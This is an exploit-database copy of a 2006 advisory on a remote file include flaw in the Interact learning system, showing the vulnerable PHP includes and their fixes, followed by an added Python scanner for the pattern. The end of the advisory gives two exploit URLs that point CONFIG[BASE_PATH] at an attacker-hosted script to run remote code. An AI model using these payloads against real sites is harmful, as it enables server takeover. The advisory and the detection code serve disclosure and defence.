interact <= 2.2 (CONFIG[BASE_PATH]) Remote File Include Vulnerability
CVE: CVE-2007-2951
Category: CWE-98
Price: Not specified
Severity: High
Author: Ibid
Risk: High
Exploitation Type: Remote
Date: 2006-09-04
CPE: cpe:cpe:/a:interact:interact:2.2
PURL: pkg:pkg:exploit/interact-2-2-config-base-path-remote-file-include-vulnerability
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080178
Below is a copy:
/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- - - [Romanian Electronic Network Security Lab Team ThE Best Romanian Hacking Team] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Cce-interact <= 2.2.0 (CONFIG[BASE_PATH]) Remote File Include Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: Interact - Online Learning and Collaboration System v. 2.2.0
- [Script site: https://sourceforge.net/projects/cce-interact/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Find by: CarcaBot
+
- Contact: CarcaBotx (at) yahoo (dot) com [email concealed]
- or
- http://Hacking.CarcaBot.ro
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: CarcaBot
- http://Hacking.CarcaBot.ro
-
+
*/
/*
vulnerable code => admin/autoprompter.php line 33-38:
....
require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc.php');
require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php');
$rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key,
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey,
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey,
{$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt,
{$CONFIG['DB_PREFIX']}posts.subject,
{$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key,
{$CONFIG['DB_PREFIX']}posts.thread_key,
{$CONFIG['DB_PREFIX']}ForumThreadManagement.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name,
{$CONFIG['DB_PREFIX']}posts.added_by_key FROM
{$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,
{$CONFIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces
LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON
{$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key
WHERE
{$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX']}posts.post_key
AND
{$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpaceLinks.ModuleKey
AND
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Spaces.SpaceKey
AND
{$CONFIG['DB_PREFIX']}posts.date_added<DATE_SUB(CURRENT_DATE,INTERVAL
{$CONFIG['DB_PREFIX']}ForumThreadManagement.DaysToWait DAY) AND
{$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key IS NULL ORDER BY
{$CONFIG['DB_PREFIX']}posts.post_key");
....
Fix Exploit:
admin/autoprompter.php line 33-38:
....
require_once('../local/config.inc.php');
require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc.php');
require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php');
$rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key,
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey,
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey,
{$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt,
{$CONFIG['DB_PREFIX']}posts.subject,
{$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key,
{$CONFIG['DB_PREFIX']}posts.thread_key,
{$CONFIG['DB_PREFIX']}ForumThreadManagement.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name,
{$CONFIG['DB_PREFIX']}posts.added_by_key FROM
{$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,
{$CONFIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces
LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON
{$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key
WHERE
{$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX']}posts.post_key
AND
{$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpaceLinks.ModuleKey
AND
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Spaces.SpaceKey
AND
{$CONFIG['DB_PREFIX']}posts.date_added<DATE_SUB(CURRENT_DATE,INTERVAL
{$CONFIG['DB_PREFIX']}ForumThreadManagement.DaysToWait DAY) AND
{$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key IS NULL ORDER BY
{$CONFIG['DB_PREFIX']}posts.post_key");
....
vulnerable code => includes/common.inc.php line 35-40:
....
$CONFIG['ADODB_PATH'] = $CONFIG['BASE_PATH'].'/includes/adodb';
//Include database abstraction classes
require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');
require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php');
....
Exploit Fix:
includes/common.inc.php line 35-40:
....
require_once('../local/config.inc.php');
$CONFIG['ADODB_PATH'] = $CONFIG['BASE_PATH'].'/includes/adodb';
//Include database abstraction classes
require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');
require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php');
*/
#Exploit:
http://www.site.com/[Cce-interact_path]/admin/autoprompter.php?CONFIG[BASE_PATH]=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[Cce-interact_path]/includes/common.inc.php?CONFIG[BASE_PATH]=[http://www.myevilsite.com/evil_scripts.txt]
### End of File ###
### http://Hacking.CarcaBot.ro ###
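
An added audit example, not part of the original advisory or the project's code: a line-based heuristic that flags PHP sources where an include/require path is built from $CONFIG[...] before the file has loaded config.inc.php itself, which is the pattern both fixes above correct. The function name and the sample sources are constructed for illustration.

```python
import re

# include/require whose path expression starts with a $CONFIG[...] element
INCLUDE_FROM_CONFIG = re.compile(
    r"\b(?:require|include)(?:_once)?\s*\(?\s*\$CONFIG\s*\[", re.IGNORECASE)
# include/require of the real configuration file (what the advisory's fix adds)
LOADS_CONFIG_FILE = re.compile(
    r"\b(?:require|include)(?:_once)?\s*\(?\s*['\"][^'\"]*config\.inc\.php['\"]",
    re.IGNORECASE)


def audit_php_source(source):
    """Return (line_no, line) for each include built from $CONFIG[...] that
    appears before the file has loaded config.inc.php on its own."""
    findings = []
    config_loaded = False
    for line_no, raw in enumerate(source.splitlines(), start=1):
        line = raw.strip()
        if line.startswith(("//", "#", "*", "/*")):
            continue  # skip comment lines (heuristic, not a PHP parser)
        if LOADS_CONFIG_FILE.search(line):
            config_loaded = True
        elif INCLUDE_FROM_CONFIG.search(line) and not config_loaded:
            findings.append((line_no, line))
    return findings


# Constructed samples modelled on the includes/common.inc.php snippets above.
VULNERABLE = """<?php
$CONFIG['ADODB_PATH'] = $CONFIG['BASE_PATH'].'/includes/adodb';
//Include database abstraction classes
require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');
require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php');
"""
FIXED = """<?php
require_once('../local/config.inc.php');
$CONFIG['ADODB_PATH'] = $CONFIG['BASE_PATH'].'/includes/adodb';
require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');
"""

if __name__ == "__main__":
    for name, src in (("vulnerable", VULNERABLE), ("fixed", FIXED)):
        hits = audit_php_source(src)
        print(name, "->", len(hits), "finding(s)")
        for line_no, line in hits:
            print(f"  line {line_no}: {line}")
```

Findings are candidates for manual review: a file that is only ever included by a script that has already loaded the configuration is reported too, because the check looks at each file in isolation.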